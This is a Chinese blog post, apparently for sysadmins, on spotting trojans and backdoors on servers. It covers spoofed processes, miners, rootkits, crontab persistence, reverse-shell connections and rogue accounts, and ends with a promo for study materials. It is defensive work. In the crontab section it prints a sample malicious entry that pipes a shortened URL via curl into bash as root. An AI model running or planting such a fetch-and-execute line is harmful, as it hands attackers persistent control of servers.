常见木马特征盘点,快速排查服务器后门
前言
服务器被植入木马、留下后门是运维、安全人员日常工作中高频遇到的安全事件。很多时候攻击者拿到服务器权限后,不会立刻搞破坏,而是悄悄种下木马、预留后门,长期潜伏,窃取数据、挖矿、作为跳板横向渗透。
很多新手排查服务器时,只会简单看一下进程,很容易被伪装后的木马绕过。本文整理服务器上木马与后门最常见的特征,同时附带排查思路,不需要复杂工具,仅凭系统自带命令就能初步筛查,适合线上服务器应急排查。
提示:本文仅用于企业内部安全自查、学习防御思路,严禁用于未授权的渗透测试,未经授权扫描、入侵服务器属于违法行为。
一、异常进程类木马特征
木马运行必然会产生进程,攻击者通常会对进程做伪装,这也是最优先排查的点位。
1. 进程名仿冒系统程序
攻击者喜欢把木马程序命名成和系统原生进程几乎一样的名字,混淆管理员视线。
- Linux 示例:
systemd→systemd-、sysytemd、system;sshd→sshd1;bash→bashd - Windows 示例:
svchost.exe、explorer.exe仿冒进程,正常 svchost 会伴随对应的服务,单独独立运行的 svchost 要重点怀疑。
排查命令(Linux)
ps -ef | less # 查看CPU、内存占用异常进程 top # 查看进程对应的可执行文件路径 ls -l /proc/[PID]/exe重点关注:进程路径不在系统默认目录(/bin、/usr/bin),而是在/tmp、/var/tmp、/dev/shm、用户家目录下。
2. 资源占用异常:挖矿木马典型特征
挖矿木马是服务器最常见木马之一,特征非常明显:
- CPU 长期 90% 以上满载,服务器业务负载并不高;
- 部分挖矿木马会限制自身占用,不会直接跑满,但持续占用 20%~40%;
- 部分挖矿会占用大量内存,磁盘读写升高。
排查要点:top 看到不知名进程高占用,查看进程文件是否位于临时目录,md5 全网比对,判断是否为已知挖矿样本。
3. 隐藏进程(Rootkit 类木马)
高级 Rootkit 木马会 hook 系统调用,ps、top看不到进程,但实际在后台运行。
排查思路:
- 查看
/proc目录,枚举 PID,比对 ps 输出,找出 ps 看不到的 PID; - 使用
lsattr检查文件隐藏属性; - 检查内核模块,
lsmod,陌生 ko 内核模块高度可疑。
二、恶意文件特征:木马 / 后门文件藏身点
攻击者偏爱放在可写、容易被忽略的临时目录,这些目录经常被清理,也容易被管理员忽略。
1. 高危目录清单(重点排查)
Linux 服务器重点目录:/tmp、/var/tmp、/dev/shm、/root/.隐藏目录、/home/*/.隐藏目录、/usr/local/bin、/etc/cron.d
Windows 服务器重点目录:C:\Temp、C:\Windows\Temp、AppData\Roaming、ProgramData
2. 文件特征
- 隐藏文件:Linux 以
.开头隐藏文件,例如.backdoor.sh、.miner;Windows 设置隐藏属性文件。 - 时间异常文件:文件修改时间和正常业务文件时间差异巨大,或者大量文件时间被篡改。
# 查找最近24小时新增文件 find /tmp -type f -mtime -1- 奇怪文件名:乱码文件名、空白文件名、特殊不可见字符文件名。
- 文件权限异常:木马脚本经常赋予 777 最高权限。
find /tmp -perm 777- 二进制文件:无版本信息、无签名、文件体积很小,静态扫描存在恶意字符串(connect、reverse、shell、backdoor)。
三、计划任务后门(持久化木马重灾区)
攻击者拿到服务器权限,第一件事往往是添加定时任务,保证木马重启后自动运行,这是最容易忽略的后门。
Linux 计划任务排查点位
- 用户级 crontab:
crontab -l查看当前用户定时任务,root 用户必须重点检查 - 系统定时任务目录
/etc/crontab /etc/cron.d/* /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/恶意定时任务典型特征:
- 定时执行 wget/curl 下载远程脚本;
- 任务执行地址为陌生外网 IP、域名;
- 任务执行脚本放在 /tmp、/dev/shm;
- 任务里面有 base64 编码字符串,直接解码执行 shell。
示例恶意 crontab:
*/5 * * * * root curl shturl.cc/0AgLrcGkubBl | bashWindows 计划任务
任务计划程序中,不知名任务,触发条件为开机 / 登录,启动程序路径在 Temp 目录。
四、网络连接特征:反弹 Shell、远控木马
木马本质大多需要和攻击者服务器通信,查看网络连接可以快速定位后门。
常见恶意网络特征
- 陌生外网出站连接:服务器主动对外发起连接,业务没有这个对外访问需求;
- 长期存在的 ESTABLISHED 稳定长连接,大概率是反弹 shell、远控木马;
- 监听端口异常:陌生端口本地监听,非业务端口。
Linux 排查命令:
# 查看所有网络连接 netstat -antlp # 新版推荐ss ss -antlp重点观察:
- 进程 PID + 程序名称;
- 外部 IP 是否为恶意 IP 段;
- 业务不需要监听端口却在监听。
注意:部分木马会使用 UDP 通信,不要只看 TCP。
五、账号与 SSH 后门特征
很多后门不依靠木马程序,直接留下账号后门,属于服务器高频后门类型。
- 新增可疑账号
Linux:cat /etc/passwd,查看 UID=0 的账号(root 权限账号),除 root 以外其他 UID0 账号都是后门。
awk -F: '$3==0 {print}' /etc/passwdWindows:查看本地管理员组,陌生管理员账号。
- SSH 后门
- 未知公钥写入
~/.ssh/authorized_keys; - 修改 sshd 配置,开启弱密码、允许 root 远程登录;
- 替换 ssh 二进制文件,伪造 ssh 后门。
排查:查看所有用户目录下.ssh文件夹,检查 authorized_keys 里面陌生公钥。
六、系统启动项、服务类木马持久化
Linux
/etc/rc.local里面恶意执行脚本;- systemd 服务:
/etc/systemd/system/下陌生 service 单元,开机自动启动恶意程序。
systemctl list-unit-filesWindows
注册表启动项、服务、WMI 事件订阅,都是木马持久化手段。
七、日志异常辅助判断
木马入侵往往会篡改日志,日志本身的异常也可以作为木马特征:
- 日志被清空、大量日志缺失;
- 日志时间跳变;
- 存在大量失败登录,紧接着出现一次成功登录;
- 大量 wget/curl 下载记录、bash 执行记录。
Linux 查看登录日志:
last lastlog八、快速排查简易检查清单(应急直接复制使用)
应急排查服务器后门,按顺序执行,快速初筛:
- 查看 CPU 内存异常进程
top,查看可疑进程的 exe 链接; - 扫描临时目录
/tmp /dev/shm /var/tmp查找最近新增文件; - 查看所有用户 crontab 和 /etc/cron.d 目录;
- 检查所有用户的 ssh 公钥 authorized_keys;
- 查找 passwd 中 UID 为 0 账号;
- ss/netstat 查看异常出站、监听端口;
- 检查 systemd 服务、rc.local 启动脚本;
- 查看登录日志 last、lastlog,判断入侵时间点。
九、发现木马后门之后的应急建议
- 不要直接重启服务器:很多木马重启后会丢失现场,优先保留证据;
- 隔离主机:断开网络,避免横向渗透内网其他服务器;
- 保留样本:对恶意文件做 hash 备份,不要直接在线执行;
- 溯源分析:判断入侵入口,是弱密码、漏洞上传还是 webshell;
- 清除后门:只删除文件不够,定时任务、账号、ssh 密钥、服务都要清理干净;
- 修复漏洞,修改所有账号强密码,加固 SSH 策略。
结尾
服务器木马和后门种类繁多,攻击者手段一直在更新,但万变不离其宗:进程、文件、网络、持久化、账号这五大维度。日常巡检养成定期检查这几项的习惯,可以提前发现潜伏木马,而不是等到挖矿、数据泄露事件爆发才应急处理。
安全排查没有银弹,本文的特征盘点是基础排查手段。遇到高级 Rootkit、内存无文件木马时,还需要内存取证、专业 EDR 工具深度分析。
免责声明:本文内容仅用于安全学习与企业授权范围内服务器安全自查,任何未经授权对服务器进行入侵、后门植入、恶意测试行为,需要承担相应法律责任。
了解网络安全,首先要搞清楚下面这些前提
- 网络安全到底包含哪些技术?是否需要会编程?
- 网络安全行业有哪些职业方向?“我”该如何选择?
- 网络安全的职业发展和成长路线是什么?
如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
一、网络安全(黑客)学习路线
网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网络安全教程视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
三、网络安全CTF实战案例
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
四、网络安全面试题
最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。
网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。
机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!
这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】